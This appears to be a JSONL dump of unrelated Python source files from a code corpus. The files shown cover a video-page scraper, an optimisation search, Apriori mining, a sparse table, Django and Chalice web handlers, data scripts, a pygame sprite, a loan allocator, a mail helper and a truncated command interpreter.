con['mediaDefinitions']:\n if 'quality' in _dict.keys() and _dict.get('videoUrl'):\n return _dict.get('videoUrl')\n\n\ndef get_title(html, site):\n if site == \"xvideos\":\n return html.cssselect(\"h2.page-title\")[0].text.strip()\n elif site == \"pornhub\":\n return ''.join(html.xpath('//h1//text()')).strip()\n","sub_path":"app/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"219208996","text":"import timeit\nstart = timeit.default_timer()\nimport numpy as np\nfrom gurobipy import *\nnp.set_printoptions(threshold=sys.maxsize)\n\ndef larman_checker(points):\n global warmstart\n global count\n m = Model(\"larman_checker\")\n m.setParam( 'OutputFlag', False )\n \n\n# Introduce Parameters for each point in R^d\n x = points\n #setParam(points, start)\n\n# Binary variables to represent the partition(k will be the \"stolen point\")\n\n p = points.shape[0]\n d = points.shape[1]\n\n\n# Binary variables to represent the partition(k will be the \"stolen point\")\n b = m.addVars(p, vtype=GRB.BINARY)\n c = m.addVars(p,p, lb= 0, ub = 1)\n e = m.addVars(p,p, lb= 0, ub = 1)\n t = m.addVar(lb=0)\n\n \n m.setObjective(t,GRB.MINIMIZE)\n #t must be equal to usage of the stolen points\n c1 = m.addConstr(t == quicksum(c[i,i] + e[i,i] for i in range(p)),\"sp\")\n\n #this constraint makes sure that the convex hulls intersect\n\n c2 = m.addConstrs(((quicksum(x[i,j]*e[i,k] for i in range(p))) == \n (quicksum(x[i,j]*c[i,k] for i in range(p))) for j in range(d) for k in range(p))\n , \"ip\")\n\n #these constraints ensure that the coefficients c and e\n #give rise to a convex combination of the points of x respecting the partition\n c3 = m.addConstrs(((quicksum(c[i,k] for i in range(p))) == 1 for k in range(p)),\"ac1\")\n c4 = m.addConstrs(((quicksum(e[i,k] for i in range(p))) == 1 for k in range(p)),\"ac2\")\n c5 = m.addConstrs((c[i,k] <= b[i] for i in range(p) for k in range(p)),\"cp1\")\n c6 = m.addConstrs((e[i,k] <= 1 - b[i] for i in range(p) for k in range(p)),\"cp2\")\n \n #warmstart using the previous solution as a starting point\n for i in range (len(m.getVars())):\n m.getVars()[i].start = warmstart[i]\n\n m.optimize();\n\n \n \n if m.Status == GRB.OPTIMAL:\n warmstart = []\n for v in m.getVars():\n warmstart.append(v.x)\n t = t.X\n if t !=0:\n count = count + 1\n print(points)\n print(count)\n \n \n \n \n \nA = np.array([[.189,.218,.258,.316,.408,.577],\n [.189,.218,.258,.316,.408,.577],\n [.189,.218,.258,.316,-1.225, 0],\n [.189,.218,.258,-1.265, 0, 0],\n [.189,.218, -1.291, 0, 0, 0],\n [0,-1.309, 0, 0, 0, 0],\n [-1.329, 0,0,0,0,0]])\n \ndef replaceRandom(arr, num):\n temp = np.asarray(arr) # Cast to numpy array\n shape = temp.shape # Store original shape\n temp = temp.flatten() # Flatten to 1D\n inds = np.random.choice(temp.size, size=num) # Get random indices\n temp[inds] = temp[inds] + 1 * np.random.rand(1,1) # Fill with something\n temp = temp.reshape(shape) # Restore original shape\n return temp\n\ncount = 0\ndef lookforexamples(start):\n global warmstart\n warmstart = np.zeros(10)\n global count\n for i in range(1000):\n larman_checker(start)\n start = replaceRandom(start, 5)\nlookforexamples(A)\n\nstop = timeit.default_timer()\n\nprint(stop - start) \n","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"44332568","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n## Author : alexloser\n## Simple Python implementation of the Apriori Algorithm\n\"\"\" This a toy for demonstrate main functions of apriori algorithm \"\"\"\nimport sys\nfrom itertools import chain, combinations\ntry: from _collections import defaultdict\nexcept: from collections import defaultdict\n\n\nclass Apriori(object):\n \"\"\" Simple apriori algotirhm implement, not fast but easy to use \"\"\"\n\n def __init__(self, min_support, min_confidence):\n if min_support <= 1e-3 or min_confidence <= 1e-3:\n raise ValueError('invalid parameters!')\n self._mins = min_support\n self._minc = min_confidence\n\n @property\n def name(self): \n return 'Apriori'\n\n def merge(self, item_set, num):\n return frozenset(i.union(j) for i in item_set for j in item_set if len(i.union(j)) == num)\n\n def sub_sets_iterator(self, arr):\n \"\"\" in : ['a', 'b', 'c']\n out: [('a',), ('b',), ('c',), ('a', 'b'), ('a', 'c'), ('b', 'c'), ('a', 'b', 'c')]\n \"\"\"\n return chain(*[combinations(arr, i + 1) for i in range(len(arr))])\n \n def items_with_min_support(self, item_set, record_list, min_support, freqcounter):\n ret = set()\n tmp = defaultdict(int)\n for item in item_set:\n for transaction in record_list:\n if item.issubset(transaction):\n freqcounter[item] += 1\n tmp[item] += 1\n for item, count in tmp.items():\n support = float(count) / len(record_list)\n if support >= min_support:\n ret.add(item)\n return ret\n\n def get_cleaned_records(self, datafile):\n item_set = set()\n record_list = list()\n with open(datafile) as fin:\n for line in fin:\n record = line.strip(' \\r\\n,').split(',')\n transaction = frozenset(record)\n record_list.append(transaction)\n for item in transaction:\n item_set.add(frozenset([item]))\n return item_set, record_list\n\n def run(self, datafile):\n \"\"\" run the apriori algorithm. datafile shoule be csv format\n return:\n - items (tuple, support)\n - rules ((tuple, tuple), confidence)\n \"\"\"\n item_set, record_list = self.get_cleaned_records(datafile)\n freqcounter = defaultdict(int)\n all_combs = list()\n min_supports_prev = self.items_with_min_support(item_set, record_list, self._mins, freqcounter)\n \n ncomb = 2\n while len(min_supports_prev):\n all_combs.append(min_supports_prev)\n min_supports_prev = self.merge(min_supports_prev, ncomb)\n min_supports_cur = self.items_with_min_support(min_supports_prev, record_list, self._mins, freqcounter)\n min_supports_prev = min_supports_cur\n ncomb += 1\n\n print(\"Total combinations:\", len(all_combs));\n\n calc_support = lambda item: float(freqcounter[item]) / len(record_list)\n \n ret_items = []\n for combs in all_combs:\n ret_items.extend([(tuple(item), calc_support(item)) for item in combs])\n\n ret_rules = []\n for combs in all_combs[1:]: # skip all_combs[0]\n for item in combs:\n for s in (frozenset(t) for t in self.sub_sets_iterator(item)):\n remain = item.difference(s)\n if len(remain) > 0:\n confidence = calc_support(item) / calc_support(s)\n if confidence >= self._minc:\n ret_rules.append(((tuple(s), tuple(remain)), confidence))\n\n print(\"Supported items: \", len(ret_items))\n print(\"Confident rules: \", len(ret_rules))\n return ret_items, ret_rules\n\n\n # TODO: rebuild this part better\n def output(self, items, rules, outputfile):\n tmp = {}\n csv = open(outputfile, 'w')\n csv.write('Sets with support >= %.3f\\n' % self._mins)\n for item, support in sorted(items, key=lambda pair: pair[1]):\n if len(item) < 2 or support < self._mins:\n continue\n tmp[item] = support\n csv.write('%-30s' % ' '.join(str(i) for i in item))\n csv.write(' support: %.4f\\n' % support)\n csv.write('\\nRules\\n')\n for rule, confidence in sorted(rules, key=lambda pair: pair[1]):\n pre, post = rule\n s = ' '.join(str(s) for s in pre) + ' => ' + ' '.join(str(s) for s in post)\n csv.write('%-32s confidence: %f\\n' % (s, confidence))\n csv.close()\n\n\nif __name__ == \"__main__\":\n from optparse import OptionParser\n optparser = OptionParser()\n optparser.set_usage('python3 -O %s [OPTIONS]' % sys.argv[0])\n\n optparser.add_option('--input', type='str', help='csv file name of train data')\n\n optparser.add_option('--min_support', type='float', default=0.15, help='minimum support threshold(>1e-3)')\n\n optparser.add_option('--min_confidence', default=0.6, type='float', help='minimum confidence threshold(>1e-3)')\n\n optparser.add_option('--output', type='str', help='file name to store results')\n\n (options, args) = optparser.parse_args()\n\n if not options.input or not options.output:\n optparser.error('See help for more details')\n\n print(\"Input file :\", options.input)\n print(\"Output file :\", options.output)\n print(\"Min support :\", options.min_support)\n print(\"Min confidence:\", options.min_confidence)\n \n apriori = Apriori(options.min_support, options.min_confidence)\n\n items, rules = apriori.run(options.input)\n apriori.output(items, rules, options.output)\n\n\n","sub_path":"apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"465200493","text":"import math\nfrom array import array\n\n\nclass MinSparseTable:\n def __init__(self, values):\n self.n = len(values)\n self.p = int(math.log2(self.n))\n\n self.dp = [array(\"l\", (0 for i in range(self.n)))] * (self.p + 1)\n self.it = [array(\"l\", (0 for i in range(self.n)))] * (self.p + 1)\n\n for i in range(self.n):\n self.dp[0][i] = values[i]\n self.it[0][i] = i\n\n self.log2 = array(\"l\", (0 for _ in range(self.n + 1)))\n\n for i in range(2, self.n + 1):\n self.log2[i] = self.log2[i // 2] + 1\n\n for p in range(1, self.p + 1):\n for i in range(self.n + 1 - (1 << p)):\n left_interval = self.dp[p - 1][i]\n right_idx = i + (1 << (p - 1))\n right_interval = self.dp[p - 1][right_idx]\n self.dp[p][i] = min(left_interval, right_interval)\n\n if left_interval <= right_interval:\n self.it[p][i] = self.it[p - 1][i]\n else:\n self.it[p][i] = self.it[p - 1][right_idx]\n\n def query_min(self, l: int, r: int):\n length = r - l + 1\n p = self.log2[length]\n k = 1 << p\n return min(self.dp[p][l], self.dp[p][r - k + 1])\n\n def query_min_idx(self, l: int, r: int) -> int:\n length = r - l + 1\n p = self.log2[length]\n k = 1 << p\n if self.dp[p][l] <= self.dp[p][r - k + 1]:\n return self.it[p][l]\n else:\n return self.it[p][r - k + 1]\n","sub_path":"python/data_structures/sparse_table.py","file_name":"sparse_table.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"34855159","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.shortcuts import redirect, render\nfrom EirSpaceAuth.forms import LoginForm\n\n\n# Create your views here.\n\n\ndef login_view(request):\n if request.method == 'POST':\n credentials = LoginForm(request.POST)\n if credentials.is_valid():\n user = authenticate(username=credentials.cleaned_data['username'],\n password=credentials.cleaned_data['password'])\n if user is not None:\n login(request, user)\n return redirect('home')\n else:\n return redirect('login')\n context = dict()\n context['form'] = LoginForm()\n return render(request, 'auth/login.html', context=context)\n\n\ndef logout_view(request):\n logout(request)\n return redirect('login')\n","sub_path":"PFA/EirSpaceAuth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"567994799","text":"import sys\nimport argparse\nfrom tqdm import tqdm\nfrom get_properties import get_properties\nfrom tqdm import tqdm\n\n\"\"\"\nHow was the tsv file created in the first place?\n- \tThe tsv file is read.\n- \tA dictionary diction in made.\n-\tEvery time the namespace is matched with the name \n\tspace mentioned in the command line argument.\n-\tIf the name space matches the dictionary diction here \n\tis updated with {name of the entity = frequency of occurance}\n\"\"\"\n\n\ndef integrate(namespace, uri_file, output_file=\"integrate.csv\", project_name=\"test_project\", url=\"Enter a valid URL\", input_file=\"Pleaes enter a valid file name\"):\n\tprint(\"Reading the TSV file: \")\n\topen_tsv = open(uri_file, 'r')\n\tread_tsv = open_tsv.readlines()\n\tdiction = {}\n\tfor line in tqdm(read_tsv):\n\t\tline = line.strip().split('\\t')\n\t\tif line[0].split('/')[-2] != namespace:\n\t\t\tcontinue\n\t\tdiction[line[0].split('/')[-1]] = line[1]\n\n\topen_tsv.close()\n\n\t\"\"\"\n\tProcessing the input file. \n\t-\tThe input file is read, out put from get_properties.py\n\t-\tReading lines from the input files.\n\t-\tIterating over every line of the read file.\n\t-\tTaking the name from the line.\n\t-\tif the given name is in the dictionry created above \n\t\tappending the url to the given name and corresponding \n\t\tfrequency to the row entry(read line). Else appending \n\t\tan empty string. \n\t-\tJoining all the elements of the list line with a comma,\n\t\tadding a new line character and then going for the next \n\t\titeration after adding it to a variable final (string addition)\n\t\"\"\"\n\t\n\n\tif (__name__ == \"__main__\"):\n\t\tprint(\"Reading the input file: \")\n\t\topen_inp = open(input_file, 'r')\n\t\tline_inp = open_inp.readlines()\n\n\tif (not __name__ == \"__main__\"):\n\t\tline_inp = get_properties(url=url, output_file=\"get_properties.csv\", project_name = project_name)\n\n\tcnt, tot = 0, 0\n\tfinal = \"\"\n\taccum = []\n\tfor in_line in tqdm(line_inp):\n\t\t\n\t\tline = in_line.strip().split(',')\n\t\tin_line = line[0]\n\t\ttot += 1\n\t\t# if ':' in m:\n\t\t# \tprint \"lol\", m\n\t\tif in_line in diction:\n\t\t\tcnt += 1\n\t\t\tline.append(\"http://dbpedia.org/\" + namespace + \"/\" + in_line)\n\t\t\tline.append(diction[in_line])\n\t\telse:\n\n\t\t\tline.append('')\n\t\t\tline.append('')\n\t\t\t# print in_line\n\n\t\tfinal += \",\".join(line)\n\t\taccum.append(\",\".join(line))\n\t\tfinal += '\\n'\n\n\t\"\"\"\n\tThe string final is the written to the output file name\n\tas given in the command line argument.\n\t\"\"\"\n\t# print final\n\tf = open(project_name+\"/\"+output_file, 'w')\n\tf.write(final)\n\tprint(\"**************************************\")\n\tprint(\"Total number of entity whose URI was found: \"+str(cnt) +\n\t\t\t\"\\nTotal number of entities present: \" + str(tot))\n\treturn accum\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Section to parse the command line arguments.\n \"\"\"\n parser = argparse.ArgumentParser()\n requiredNamed = parser.add_argument_group('Required Arguments')\n requiredNamed.add_argument(\n '--namespace', dest='ns', metavar='ns', help='eg: \"ontology\"', required=True)\n requiredNamed.add_argument('--input_file', dest='inp', metavar='inp',\n help='Output from previous step', required=True)\n requiredNamed.add_argument('--uri_file', dest='uri', metavar='uri',\n help='eg: File which contains uri and number of occurrences of properties', required=True)\n requiredNamed.add_argument('--output_file', dest='out', metavar='out',\n help='File in which you want to store output', required=True)\n requiredNamed.add_argument('--project_name', dest='project_name',\n metavar='project_name', help='test', required=True)\n args = parser.parse_args()\n namespace = args.ns\n input_file = args.inp\n uri_file = args.uri\n output_file = args.out\n project_name = args.project_name\n integrate(namespace, uri_file, output_file,\n project_name, \"Enter a valid URL\", input_file)\n pass\n","sub_path":"gsoc/anand/.pipeline_2/integrate.py","file_name":"integrate.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"608676840","text":"import os\n\nfrom chalice import Chalice\nfrom chalice import BadRequestError, NotFoundError\nfrom chalice import CognitoUserPoolAuthorizer\n\nfrom chalicelib import database\n\napp = Chalice(app_name='todo-back')\napp.debug = True\n\nauthorizer = CognitoUserPoolAuthorizer(\n 'ToDoAppUserPool', provider_arns=[os.environ['USER_POOL_ARN']]\n)\n\n@app.route('/', methods=['GET'], authorizer=authorizer)\ndef authed_index():\n # print(os.environ['USER_POOL_ARN'])\n return {'success': True}\n\n\n@app.route('/todos', methods=['GET'], cors=True)\ndef get_all_todos():\n return database.get_all_todos()\n\n\n@app.route('/todos/{todo_id}', methods=['GET'], cors=True)\ndef get_todo(todo_id):\n todo = database.get_todo(todo_id)\n if todo:\n return todo\n else:\n raise NotFoundError('Todo not found.') # 404\n\n\n@app.route('/todos', methods=['POST'], cors=True)\ndef create_todo():\n # リクエストメッセージjson_bodyを修得\n todo = app.current_request.json_body\n\n # 必須項目をチェック\n for key in ['title', 'memo', 'priority']:\n if key not in todo:\n raise BadRequestError(f\"{key} is required.\")\n\n # データを登録\n return database.create_todo(todo)\n\n\n@app.route('/todos/{todo_id}', methods=['PUT'], cors=True)\ndef update_todo(todo_id):\n changes = app.current_request.json_body\n\n # データを更新\n return database.update_todo(todo_id, changes)\n\n\n@app.route('/todos/{todo_id}', methods=['DELETE'], cors=True)\ndef delete_todo(todo_id):\n # データを削除\n return database.delete_todo(todo_id)\n\n# The view function above will return {\"hello\": \"world\"}\n# whenever you make an HTTP GET request to '/'.\n#\n# Here are a few more examples:\n#\n# @app.route('/hello/{name}')\n# def hello_name(name):\n# # '/hello/james' -> {\"hello\": \"james\"}\n# return {'hello': name}\n#\n# @app.route('/users', methods=['POST'])\n# def create_user():\n# # This is the JSON body the user sent in their POST request.\n# user_as_json = app.current_request.json_body\n# # We'll echo the json body back to the user in a 'user' key.\n# return {'user': user_as_json}\n#\n# See the README documentation for more examples.\n#\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"26185582","text":"import os\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\n\nfrom ConfLearning.util.model_to_latex import latex_to_png\nfrom regression import regression\n\npath_data = os.path.join(Path.cwd(), '../data/')\n\ndata = pd.read_pickle(os.path.join(path_data, 'data.pkl'))\n\nnsubjects = 66\nnblocks = 11\nnpairs = 10\nntrials_phase0 = (9, 12, 15, 18)\nntrials_phase1 = (0, 5, 10, 15)\nntrials_phase2 = (9, 12, 15, 18)\n\n# We're including subjects with at least 55% performance\ninclude = np.where(np.array(100*data.groupby('subject').correct.mean().values, int) > 55)[0]\nexclude = np.setdiff1d(range(nsubjects), include)\nprint(f\"Subjects with performance < 0.55 (N={len(exclude)}, remain={nsubjects - len(exclude)}): [{', '.join([str(v) for v in exclude])}]\")\n\n\nmap = dict(\n b_designated_absvaluediff='block_difficulty',\n b_valuebase='block_value_level',\n b_ntrials_pre='block_ntrials_phase1',\n b_ntrials_noc='block_ntrials_phase2',\n b_stimulus_pool='block_stimulus_type',\n value_chosen='value',\n ratingdiff21='rating_change',\n)\nd = data.copy().rename(columns=map)\n\n\nps = ['block_difficulty', 'block_value_level', 'block_stimulus_type', 'block_stimulus_type', 'block_ntrials_phase1', 'block_ntrials_phase2', 'value']\nmodel = regression(\n d[~d.rating_change.isna() & (d.block_ntrials_phase2 > 0)],\n # patsy_string='ratingdiff ~ ' + ' + '.join(ps),\n patsy_string='rating_change ~ ' + ' + '.join(ps) + ' + value:block_ntrials_phase2',\n standardize_vars=True,\n ignore_warnings=True,\n model_blocks=True,\n reml=False,\n print_data=False\n)\nskip_var_hack = 'subject Var & 0.023 & 0.034 & & & & \\\\\\\\\\nblock Var & 0.074 & 0.043 & & & & \\\\\\\\\\n'\nlatex_to_png(model, outpath=os.path.join(os.getcwd(), 'regtables', f'{Path(__file__).stem}.png'),\n title=None, DV='rating\\_change', skip_var_hack=skip_var_hack)","sub_path":"stats/ratingdiff_effect_lenghtphase2.py","file_name":"ratingdiff_effect_lenghtphase2.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"232184629","text":"import pygame\r\n\r\nWHITE = (255, 255, 255)\r\nBLUE = (0, 0, 255)\r\nGREEN = (0, 255, 0)\r\nRED = (255, 0, 0)\r\nPURPLE = (255, 0, 255)\r\nBLACK = (0, 0, 0)\r\n\r\nclass enemy(pygame.sprite.Sprite):\r\n \"\"\"\r\n This class represents the enemy\r\n It derives from the \"Sprite\" class in Pygame.\r\n \"\"\"\r\n\r\n def __init__(self, color, width, height, name):\r\n \"\"\" Constructor. Pass in the color of the block,\r\n and its size. \"\"\"\r\n\r\n # Call the parent class (Sprite) constructor\r\n super().__init__()\r\n\r\n # Create an image of the block, and fill it with a color.\r\n # This could also be an image loaded from the disk.\r\n self.image = pygame.image.load(name)\r\n self.image.set_colorkey(BLACK)\r\n\r\n # Fetch the rectangle object that has the dimensions of the image\r\n # image.\r\n # Update the position of this object by setting the values\r\n # of rect.x and rect.y\r\n self.rect = self.image.get_rect()\r\n\r\n # Instance variables that control the edges of where we bounce\r\n self.left_boundary = 10\r\n self.right_boundary = 10\r\n self.top_boundary = 10\r\n self.bottom_boundary = 10\r\n\r\n # Instance variables for our current speed and direction\r\n self.change_x = 0\r\n self.change_y = 0\r\n\r\n def collision_test(self, rect, tiles):\r\n \"Returns the Rect of the tile with which the player collides\"\r\n hit_list = []\r\n for tile in tiles:\r\n if rect.colliderect(tile):\r\n hit_list.append(tile)\r\n return hit_list\r\n\r\n def update(self):\r\n \"\"\" Called each frame. \"\"\"\r\n self.rect.x += self.change_x\r\n self.rect.y += self.change_y\r\n\r\n if self.rect.right >= self.right_boundary or self.rect.left <= self.left_boundary:\r\n self.change_x *= -1\r\n\r\n if self.rect.bottom >= self.bottom_boundary or self.rect.top <= self.top_boundary:\r\n self.change_y *= -1","sub_path":"enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"209012218","text":"from models.models import LoanAssignment, FacilityYield\nfrom common.utils import *\n\n\nclass LoanService(object):\n\n def __init__(self, facilities, covenants):\n self.facilities = facilities\n self.covenants = covenants\n self._facility_yields = {}\n self.log = get_logger(__name__)\n\n def process_loan(self, loan):\n try:\n if not loan:\n return\n\n facility_id, interest_rate = self._find_facility(loan)\n\n if not facility_id:\n return\n\n loan_assignment = self._get_loan_assignment(loan, facility_id, interest_rate)\n if loan_assignment:\n self._add_to_facility_yield(loan_assignment)\n\n except Exception as e:\n self.log.error(e)\n\n return loan_assignment\n\n def get_facility_yields(self):\n return self._facility_yields\n\n # =====================\n # PRIVATE FUNCTIONS\n # =====================\n def _add_to_facility_yield(self, loan_assignment):\n\n key = str(loan_assignment.facility_id)\n facility_yield = self._facility_yields.get(key)\n\n if facility_yield:\n facility_yield.expected_yield += loan_assignment.expected_yield\n else:\n facility_yield = FacilityYield()\n facility_yield.facility_id = loan_assignment.facility_id\n facility_yield.expected_yield = loan_assignment.expected_yield\n\n self._facility_yields.update({key: facility_yield})\n\n def _get_loan_assignment(self, loan, facility_id, interest_rate):\n\n if not loan:\n return\n\n expected_yield = self._calculate_expected_yield(loan.default_likelihood,\n loan.interest_rate,\n loan.amount,\n interest_rate)\n\n loan_asignment = LoanAssignment()\n loan_asignment.loan_id = loan.loan_id\n loan_asignment.facility_id = facility_id\n loan_asignment.expected_yield = expected_yield\n\n return loan_asignment\n\n def _find_facility(self, loan):\n cheapest_interest = None\n found_facility = None\n\n for key, facility in self.facilities.items():\n\n if loan.amount <= facility.amount and loan.interest_rate >= facility.interest_rate:\n\n if self._verify_covenant(loan, facility):\n\n interest = facility.interest_rate * loan.amount\n\n if cheapest_interest is None or interest < cheapest_interest:\n cheapest_interest = interest\n found_facility = facility\n\n if found_facility is None:\n return None, None\n\n found_facility.amount -= loan.amount\n\n return found_facility.facility_id, found_facility.interest_rate\n\n def _verify_covenant(self, loan, facility):\n key = get_key(facility.bank_id, facility.facility_id)\n covenant = self.covenants.get(key)\n if not covenant:\n return False\n else:\n return loan.default_likelihood <= covenant.max_default_likelihood and \\\n loan.state not in covenant.banned_states\n\n def _calculate_expected_yield(self, default_likelihood, loan_interest_rate, loan_amount, facility_interest_rate):\n\n expected_yield = (1 - default_likelihood) * loan_interest_rate * loan_amount \\\n - default_likelihood * loan_amount \\\n - facility_interest_rate * loan_amount\n\n return expected_yield\n","sub_path":"loan_serve.py","file_name":"loan_serve.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"57561080","text":"'''\n2(challenge). The method that’s usually used to look up an entry in a phone book is not\nexactly the same as a binary search because, when using a phone book, you don’t always go\nto the midpoint of the sublist being searched. Instead, you estimate the position of the\ntarget based on the alphabetical position of the first letter of the person’s last name.\nFor example, when you are looking up a number for “Smith,” you look toward the middle of\nthe second half of the phone book first, instead of in the middle of the entire book.\nSuggest a modification of the binary search algorithm that emulates this strategy for a\nlist of names. Is its computational complexity any better than that of the standard\nbinary search?\n'''\n\nimport string\n\ndef dict_generator():\n alpha = {}\n num = 0\n for i in list(string.ascii_lowercase):\n alpha[i] = num\n num += 1\n return alpha\n\ndef phone_book_lookup(dict,phone_book):\n name = input(\"Enter the name of the user you would like to search: \")\n first_letter = dict[name[0].lower()]\n if first_letter < 9:\n for key in phone_book.keys():\n key_num = dict[key[0]]\n if first_letter <= key_num:\n for key in phone_book.keys():\n if name.lower() == key.lower():\n return f'{name}:{phone_book[key]}'\n elif first_letter > 18 and first_letter < 26:\n for key in list(reversed(phone_book.keys())):\n key_num = dict[key[0]]\n if first_letter <= key_num:\n for key in phone_book.keys():\n if name.lower() == key.lower():\n return f'{name}:{phone_book[key]}'\n else:\n phone_keys = list(phone_book.keys())\n print(phone_keys)\n right = len(list(phone_keys))\n left = 0\n while left <= right:\n midpoint = (left + right) // 2\n if name == phone_keys[midpoint]:\n return f'{name}:{phone_book[name.lower()]}'\n elif first_letter < dict[phone_keys[midpoint][0]]:\n right = midpoint - 1\n else:\n left = midpoint + 1\n\n\nphone_book = {\n 'aaron':'555-0001',\n 'carson':'555-0002',\n 'frank':'555-0003',\n 'juliet':'555-0004',\n 'pratt':'555-0005',\n 'perry':'555-0010',\n 'reuben':'555-0006',\n 'tim':'555-0007',\n 'victor':'555-0008'\n}\n\nprint(phone_book_lookup(dict_generator(),phone_book))","sub_path":"Practice/binarySearchChallenge.py","file_name":"binarySearchChallenge.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"478059188","text":"from django.template.loader import render_to_string\nfrom email.mime.image import MIMEImage\nimport mimetypes\nfrom django.core.mail import EmailMultiAlternatives\n\n\ndef send_mail(subject, text_content, from_email, to, html_content=None, attachments=[], cc=[], bcc=[]):\n \"\"\"\n This function sends mail using EmailMultiAlternatives and attachs all attachments\n passed as parameters\n \"\"\"\n msg = EmailMultiAlternatives(subject, text_content, from_email, to, cc=cc, bcc=bcc)\n if html_content:\n msg.attach_alternative(html_content, \"text/html\")\n if attachments:\n for att in attachments:\n if att:\n\n mimetype = mimetypes.guess_type(att)[0]\n if str(mimetype) in ('image/jpeg', 'image/pjpeg', 'image/png', 'image/gif'):\n try:\n with open(att, 'r') as f:\n email_embed_image(msg, att, f.read())\n except Exception as e:\n print(e)\n else:\n msg.attach_file(att)\n return msg.send()\n\n\ndef send_rendered_mail(subject, template_name, context_dict, from_email, to, attachments=[], cc=[], bcc=[]):\n \"\"\"\n It sends mail after rendering html content and normal text using two different template (.html, .txt) with\n the same name.\n\n :param subject:\n :param template_name: without file extension\n :param context_dict:\n :param from_email:\n :param to:\n :param attachments:\n \"\"\"\n rendered = render_to_string(u\"{}.html\".format(template_name), context_dict)\n text_content = render_to_string(u\"{}.txt\".format(template_name), context_dict)\n return send_mail(subject, text_content, from_email, to, rendered, attachments, cc=cc, bcc=bcc)\n\n\ndef email_embed_image(email, img_content_id, img_data):\n \"\"\"\n email is a django.core.mail.EmailMessage object\n \"\"\"\n img = MIMEImage(img_data)\n img.add_header('Content-ID', '<%s>' % img_content_id)\n img.add_header('Content-Disposition', 'inline')\n email.attach(img)\n","sub_path":"twentytab/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"50976856","text":"#!/usr/bin/python3\n\"\"\"\n this module contains the entry point of the command interpreter\n\"\"\"\n\n\nimport cmd\nimport models\nimport shlex\n\n\nclass HBNBCommand(cmd.Cmd):\n prompt = '(hbnb) '\n\n def do_create(self, arg):\n \"\"\" create a new instances of BaseModel, saves it to a JSON file\n and prints the 'id'.\n \"\"\"\n if arg == \"\":\n print('** class name missing **')\n elif arg not in models.classes:\n print('** class doesn\\'t exist **')\n else:\n new_model = models.classes[arg]()\n models.storage.save()\n print(new_model.id)\n\n def do_show(self, arg):\n \"\"\" Print the string representation of an instance based on the class\n name and 'id'\n \"\"\"\n args = shlex.split(arg)\n try:\n if args[0] not in models.classes:\n raise NameError\n class_name = args[0]\n except IndexError:\n print(\"** class name missing **\")\n return\n except NameError:\n print(\"** class doesn't exist **\")\n return\n\n try:\n expected_id = args[1]\n except IndexError:\n print(\"** instance id missing **\")\n return\n objs = models.storage.all()\n for obj_id, obj in objs.items():\n if obj.__class__.__name__ == class_name and obj.id == expected_id:\n print(obj)\n return\n print(\"** no instance found **\")\n\n def do_destroy(self, arg):\n \"\"\" delete an instance based on the class name and 'id'\n (save the change into the JSON file)\n \"\"\"\n args = shlex.split(arg)\n try:\n if args[0] not in models.classes:\n raise NameError\n class_name = args[0]\n except IndexError:\n print(\"** class name missing **\")\n return\n except NameError:\n print(\"** class doesn't exist **\")\n return\n try:\n expected_id = args[1]\n except IndexError:\n print(\"** instance id missing **\")\n return\n objs = models.storage.all()\n for obj_id, obj in objs.items():\n if obj.__class__.__name__ == class_name and obj.id == expected_id:\n objs.pop(obj_id)\n models.storage.save()\n return\n print(\"** no instance found **\")\n\n def do_all(self, arg):\n \"\"\" print all string representation of all instances based or not on\n the class name\n \"\"\"\n try:\n new_list = []\n objs = models.storage.all()\n if arg == \"\":\n for obj in objs.values():\n new_list.append(obj)\n print(new_list)\n else:\n if arg not in models.classes:\n raise NameError\n for obj_id, obj in objs.items():\n if obj.__class__.__name__ == arg:\n new_list.append(obj)\n print(new_list)\n except NameError:\n print(\"** class doesn't exist **\")\n\n def do_update(self, arg):\n \"\"\" update an instance based on the class name and 'id' by adding or\n updating attribute\n \"\"\"\n args = shlex.split(arg)\n\n try:\n if args[0] not in models.classes:\n raise NameError\n class_name = args[0]\n except IndexError:\n print(\"** class name missing **\")\n return\n except NameError:\n print(\"** class doesn't exist **\")\n return\n\n try:\n found = 0\n expected_id = args[1]\n objs = models.storage.all()\n for obj_id, obj in objs.items():\n if str(obj.id) == expected_id:\n found = 1\n obj_to_change = obj\n break\n if found == 0:\n raise NameError\n except IndexError:\n print(\"** instance id missing **\")\n return\n except NameError:\n print(\"** no instance found **\")\n return\n\n try:\n expected_attr = args[2]\n except IndexError:\n print(\"** attribute name missing **\")\n return\n\n try:\n setattr(obj_to_change, expected_attr, args[3])\n except 